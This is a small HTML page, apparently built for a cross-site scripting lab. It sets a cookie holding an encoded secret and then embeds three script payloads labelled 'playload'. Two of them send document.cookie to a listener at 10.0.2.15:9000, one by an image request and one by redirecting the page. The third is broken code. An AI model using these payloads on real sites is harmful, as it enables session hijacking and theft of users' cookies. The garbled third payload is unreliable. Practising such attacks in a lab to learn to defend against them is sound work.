<!DOCTYPE html>
<html>
<body>

<h2>My First Web Page</h2>
<p>My first paragraph.</p>
<script>
  document.write("<h1>Main title</h1>")
  document.cookie = "username= e3RoaXMgaXMgYSBzZWNyZXQgbWVzc2FnZSBwcm90ZWN0IGl0IHdpdGggeW91ciBsaWZlfQ=="; 
</script>
<script>var i=new Image;i.src="http://10.0.2.15:9000/?"+document.cookie;</script> // playload 1
<script type="text/javascript">document.location="http://10.0.2.15:9000/?c="+document.cookie;</script> //playload 2
<script>var w=new file;i.src="http://10.0.2.15:9000/?"+document.write("<h1>Out with the old, in with the new!</h1>");</script> //playload 3
</body>
</html>
